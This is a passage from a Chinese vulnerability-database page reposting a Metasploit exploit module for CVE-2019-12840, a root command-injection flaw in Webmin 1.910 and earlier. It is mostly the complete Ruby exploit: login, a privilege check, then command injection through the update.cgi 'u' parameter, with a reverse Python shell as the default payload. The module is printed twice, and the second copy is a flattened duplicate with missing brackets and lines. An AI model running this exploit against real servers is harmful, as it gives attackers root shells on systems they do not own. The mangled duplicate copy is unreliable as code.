Webmin 小于等于 1.910 – ‘Package Updates’ RCE

发表于 2019年09月03日
Vulndb

目录表

EDB-ID: 46984

CVE-2019-12840

在 Webmin<= 1.910中，任何被授权到“ Package Updates”模块的用户都可以通过 data 参数 update.cgi 使用 root 权限执行任意命令。这造成了RCE漏洞。

Webmin <= 1.910 - 'Package Updates' RCE

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Webmin <= 1.910 - "Package Updates" Remote Command Execution',
      'Description'    => %q(
        This module exploits an arbitrary command execution vulnerability in Webmin
        1.910 and lower versions. Any user authorized to the "Package Updates"
        module can execute arbitrary commands with root privileges.

      ),
      'Author'         => [
        'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
      ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2019-'],
          ['URL', 'https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html']
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 512,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'DefaultOptions' =>
        {
          'RPORT' => 10000,
          'SSL'   => false,
          'PAYLOAD' => 'cmd/unix/reverse_python' # its depends
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [['Webmin <= 1.910', {}]],
      'DisclosureDate' => 'May 16 2019',
      'DefaultTarget'  => 0)
    )
    register_options [
        OptString.new('USERNAME',  [true, 'Webmin Username']),
        OptString.new('PASSWORD',  [true, 'Webmin Password']),
        OptString.new('TARGETURI',  [true, 'Base path for Webmin application', '/'])
    ]
  end

  def peer
    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
  end

  def login
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri, 'session_login.cgi'),
      'cookie' => 'testing=1',
      'vars_post' => {
        'page' => '',
        'user' => datastore['USERNAME'],
        'pass' => datastore['PASSWORD']
      }
    })

    if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/
      return $1
    end

    return nil unless res
    ''
  end
##
# Target and input verification
##
  def check
    cookie = login
    return CheckCode::Detected if cookie == ''
    return CheckCode::Unknown if cookie.nil?

    vprint_status('Attempting to execute...')
    # check package update priv
    res = send_request_cgi({
      'uri'     => normalize_uri(target_uri.path, "package-updates/"),
      'cookie'  => "sid=#{cookie}"
    })

    if res && res.code == 200 && res.body =~ /Software Package Update/
      print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
      return CheckCode::Vulnerable
    end
    print_error("#{datastore['USERNAME']} has not the right to >>Package Update<<")
    print_status("Please try with another user account!")
    CheckCode::Safe
  end
##
# Exploiting phase
##
  def exploit
    cookie = login
    if cookie == '' || cookie.nil?
      fail_with(Failure::Unknown, 'Failed to retrieve session cookie')
    end
    print_good("Session cookie: #{cookie}")

    res = send_request_raw(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
      'headers' =>
        {
          'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1"
        },
      'cookie' => "redirect=1; testing=1; sid=#{cookie}"
    )
    unless res && res.code == 200
      fail_with(Failure::Unknown, 'Request failed')
    end

    print_status("Attempting to execute the payload...")
    exec(cookie)

  end

  def exec(cookie)

    command = payload.encoded

    res = send_request_cgi(
      {
      'method' => 'POST',
      'cookie' => "sid=#{cookie}",
      'ctype'  => 'application/x-www-form-urlencoded',
      'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
      'headers' =>
        {
          'Referer' => "#{peer}/package-updates/?xnavigation=1"
        },
      'data' => "u=acl%2Fapt&u=%20%7C%20#{command}&ok_top=Update+Selected+Packages"
      })

  end
end
##
# The end of the adventure (o_O) // AkkuS
##

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(update_info(info,

'Name' => 'Webmin <= 1.910 - "Package Updates" Remote Command Execution',

'Description' => %q(

This module exploits an arbitrary command execution vulnerability in Webmin

1.910 and lower versions. Any user authorized to the "Package Updates"

module can execute arbitrary commands with root privileges.

'Author' => [

'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module

'License' => MSF_LICENSE,

'References' =>

[

['CVE', '2019-'],

['URL', 'https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html']

'Privileged' => true,

'Payload' =>

{

'DisableNops' => true,

'Space' => 512,

'Compat' =>

{

'PayloadType' => 'cmd'

}

'DefaultOptions' =>

{

'RPORT' => 10000,

'SSL' => false,

'PAYLOAD' => 'cmd/unix/reverse_python' # its depends

'Platform' => 'unix',

'Arch' => ARCH_CMD,

'Targets' => [['Webmin <= 1.910', {}]],

'DisclosureDate' => 'May 16 2019',

'DefaultTarget' => 0)

)

register_options [

OptString.new('USERNAME', [true, 'Webmin Username']),

OptString.new('PASSWORD', [true, 'Webmin Password']),

OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])

]

end

def peer

"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"

end

def login

res = send_request_cgi({

'method' => 'POST',

'uri' => normalize_uri(target_uri, 'session_login.cgi'),

'cookie' => 'testing=1',

'vars_post' => {

'page' => '',

'user' => datastore['USERNAME'],

'pass' => datastore['PASSWORD']

}

})

if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/

return $1

end

return nil unless res

end

# Target and input verification

def check

cookie = login

return CheckCode::Detected if cookie == ''

return CheckCode::Unknown if cookie.nil?

vprint_status('Attempting to execute...')

# check package update priv

res = send_request_cgi({

'uri' => normalize_uri(target_uri.path, "package-updates/"),

'cookie' => "sid=#{cookie}"

})

if res && res.code == 200 && res.body =~ /Software Package Update/

print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")

return CheckCode::Vulnerable

end

print_error("#{datastore['USERNAME']} has not the right to >>Package Update<<")

print_status("Please try with another user account!")

CheckCode::Safe

end

# Exploiting phase

def exploit

cookie = login

if cookie == '' || cookie.nil?

fail_with(Failure::Unknown, 'Failed to retrieve session cookie')

end

print_good("Session cookie: #{cookie}")

res = send_request_raw(

'method' => 'POST',

'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),

'headers' =>

{

'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1"

'cookie' => "redirect=1; testing=1; sid=#{cookie}"

)

unless res && res.code == 200

fail_with(Failure::Unknown, 'Request failed')

end

print_status("Attempting to execute the payload...")

exec(cookie)

end

def exec(cookie)

command = payload.encoded

res = send_request_cgi(

{

'method' => 'POST',

'cookie' => "sid=#{cookie}",

'ctype' => 'application/x-www-form-urlencoded',

'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),

'headers' =>

{

'Referer' => "#{peer}/package-updates/?xnavigation=1"

'data' => "u=acl%2Fapt&u=%20%7C%20#{command}&ok_top=Update+Selected+Packages"

})

end

# The end of the adventure (o_O) // AkkuS

原文：via

标签：RCE , Webmin , 漏洞原文连接：Webmin 小于等于 1.910 – ‘Package Updates’ RCE 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

国内外CDN域名列表收集项目：DomainFrontingLists Webmin 小于等于 1.920 - Unauthenticated RCE